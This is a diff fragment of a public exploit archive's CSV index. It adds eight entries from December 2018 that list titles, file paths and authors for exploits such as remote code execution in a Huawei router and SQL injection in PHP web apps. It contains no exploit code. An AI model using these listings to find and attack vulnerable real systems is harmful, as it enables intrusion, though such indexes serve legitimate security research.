 43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
 43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
 43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
@@ -40480,3 +40485,11 @@ id,file,description,date,author,type,platform,port
 45977,exploits/php/webapps/45977.txt,"WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection",2018-12-11,Kaimi,webapps,php,80
 45978,exploits/php/webapps/45978.txt,"ThinkPHP 5.0.23/5.1.31 - Remote Code Execution",2018-12-11,VulnSpy,webapps,php,80
 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,
+45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,
+45989,exploits/multiple/webapps/45989.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure",2018-12-14,alt3kx,webapps,multiple,
+45990,exploits/multiple/webapps/45990.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)",2018-12-14,alt3kx,webapps,multiple,
+45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,
+45992,exploits/php/webapps/45992.html,"Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)",2018-12-14,Veyselxan,webapps,php,
+45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
+45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
+45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,